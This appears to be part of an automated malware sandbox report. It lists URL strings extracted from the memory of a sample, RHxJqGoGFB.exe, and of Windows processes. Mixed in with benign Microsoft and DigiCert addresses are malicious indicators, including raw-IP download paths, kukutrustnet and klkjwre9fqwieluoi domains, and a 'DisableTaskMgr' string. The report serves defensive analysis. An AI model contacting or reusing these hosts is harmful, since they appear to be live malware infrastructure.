        Source: RHxJqGoGFB.exe, 00000000.00000002.4215278724.0000000000760000.00000004.10000000.00040000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4224126258.00000000008B9000.00000004.00000010.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, RHxJqGoGFB.exe, 00000000.00000003.1707211906.000000000045B000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4178026991.000000000047A000.00000004.00000020.00020000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000023.00000002.4185881293.0000000000890000.00000004.10000000.00040000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000029.00000002.4188857205.0000000000BB0000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://89.11
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.119.67.154/testo5/
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: svchost.exe, 0000000A.00000000.1864124702.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1864095821.0000019E29FB9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: svchost.exe, 0000000A.00000000.1864124702.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1864095821.0000019E29FB9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
        Source: SearchApp.exe, 00000013.00000000.1964753726.0000024B4136F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1981999938.0000024B422C3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1963660195.000002434119B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1964714282.0000024B41348000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1983410823.0000024B4247F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1984144267.0000024B425C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: svchost.exe, 0000000A.00000000.1864124702.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1864095821.0000019E29FB9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777.info/home.gif
        Source: RHxJqGoGFB.exe, RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet888.info/home.gif
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet987.info/home.gif
        Source: svchost.exe, 0000000A.00000000.1864124702.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1864095821.0000019E29FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: SearchApp.exe, 00000013.00000000.1964753726.0000024B4136F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1981999938.0000024B422C3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1963660195.000002434119B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1964714282.0000024B41348000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1983410823.0000024B4247F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1984144267.0000024B425C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
        Source: SearchApp.exe, 00000013.00000000.2109147873.0000024B59C44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlF15-2L
        Source: SearchApp.exe, 00000013.00000000.1991896773.0000024B441DE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1964753726.0000024B4136F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1981999938.0000024B422C3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1963261928.0000024341183000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1964714282.0000024B41348000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1983410823.0000024B4247F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: SearchApp.exe, 00000013.00000000.2034377781.0000024B54FDE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schema.skype.com/Mention
        Source: SearchApp.exe, 00000013.00000000.1955687882.0000024339C6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.live.com/Web/
        Source: explorer.exe, 0000000D.00000000.1884699661.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.1887432165.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885217454.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 00000012.00000000.1950585852.000001ECFC470000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: RHxJqGoGFB.exe, 00000000.00000002.4268486662.000000000379B000.00000004.00000010.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4224126258.00000000008B9000.00000004.00000010.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, RHxJqGoGFB.exe, 00000000.00000003.1707211906.000000000045B000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4178026991.000000000047A000.00000004.00000020.00020000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000023.00000002.4185881293.0000000000890000.00000004.10000000.00040000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000029.00000002.4188857205.0000000000BB0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?137bd669=-1353021007
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?23c0ebb4=-1895584048
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?351a1728=890902312
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?3a84ca85=1595719454
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?3a84ca85=1595719454$
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?3f4695e4=2025970408
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?50768d20=-1595073984
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?52e81f=5433375
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?564061b2=1493272264
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?564061b2=1493272264p
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?5d4ae9a2=1565190562
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?5d4ae9a2=15651905621
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?6eb084dd=1390751906
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?7f4bf891=2088491733
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?7f4bf891=2088491733L
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?850adac5=169194890
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?8a6244f0=-1973271312
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?8ffc239e=-1342936358
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?8ffc239e=-1342936358R
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?a04580ea=-2129263704
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?a5cbf448=-735340920
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?a5cbf448=-735340920c
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?aba116d6=-1318608934
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?aba116d6=-1318608934o
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?afe2fd9b=-1081346452
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?afe2fd9b=-1081346452V
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?b2218d7f=-930728452
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?b2218d7f=-930728452.
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?b6c9abde=-8146158E
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?b6c9abde=-8146158H
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?b6c9abde=-8146158heY
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455330056.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?bae437ef=816621517
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455330056.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?bae437ef=816621517e
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455330056.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?bae437ef=816621517ewf
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?bffd1911=-1073932015Cf
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?bffd1911=-1073932015ae
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?c4094dae=-1470297908
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?c76fb70f=499047484
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?cb1bfe6d=-887357843
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?ce953af5=1957287848
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?ce953af5=1957287848.f
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?d2293919=899431162Ge
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?d2293919=899431162Je
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?d53ab8af=2142251533
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?d9476d1b=2093630222
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?d9476d1b=2093630222Te&
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?dcb5489d=1334471441
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?dcb5489d=1334471441Pf
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?e14e2c8c=-1544911452
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?e6095c35=-871188374
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.000000000043E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?ecc6b51c=1069749016
        Source: RHxJqGoGFB.exe, 00000000.00000002.4268486662.000000000379B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?f017666e=1892850142
        Source: RHxJqGoGFB.exe, 00000000.00000002.4268486662.000000000379B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gifavolos.gif
        Source: RHxJqGoGFB.exe, 00000000.00000002.4215278724.0000000000760000.00000004.10000000.00040000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4224126258.00000000008B9000.00000004.00000010.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, RHxJqGoGFB.exe, 00000000.00000003.1707211906.000000000045B000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4178026991.000000000047A000.00000004.00000020.00020000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000023.00000002.4185881293.0000000000890000.00000004.10000000.00040000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000029.00000002.4188857205.0000000000BB0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gifhttp://46.105.103.219/sobakavolos.gif
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4268486662.000000000379B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gifhttp://46.105.103.219/sobakavolos.gifK
        Source: RHxJqGoGFB.exe, RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers
        Source: svchost.exe, 00000009.00000000.1856834197.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
        Source: svchost.exe, 00000009.00000000.1856834197.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.3110275935.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
        Source: svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comt
        Source: SearchApp.exe, 00000013.00000000.1991249729.0000024B440E7000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1955687882.0000024339C6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
        Source: SearchApp.exe, 00000013.00000000.1991249729.0000024B440E7000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1955687882.0000024339C6C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1982087005.0000024B422E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
        Source: SearchApp.exe, 00000013.00000000.1974545308.0000024B41F56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
        Source: SearchApp.exe, 00000013.00000000.2007962329.0000024B447AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/fixsearch
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 0000000D.00000000.1885971448.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: SearchApp.exe, 00000013.00000000.1961146784.0000024340CDC000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2056369777.0000024B55A15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5
        Source: explorer.exe, 0000000D.00000000.1885971448.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
        Source: explorer.exe, 0000000D.00000002.4185243812.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.4303202418.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1881934749.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1880009773.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 0000000D.00000000.1885971448.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: SearchApp.exe, 00000013.00000000.1955650255.0000024339C3F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comC
        Source: explorer.exe, 0000000D.00000000.1885971448.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
        Source: svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1857045452.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
        Source: svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
        Source: svchost.exe, 00000009.00000000.1857045452.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.comer
        Source: svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.coms
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
        Source: svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
        Source: StartMenuExperienceHost.exe, 00000011.00000000.1920243025.000001B98144E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.comcp
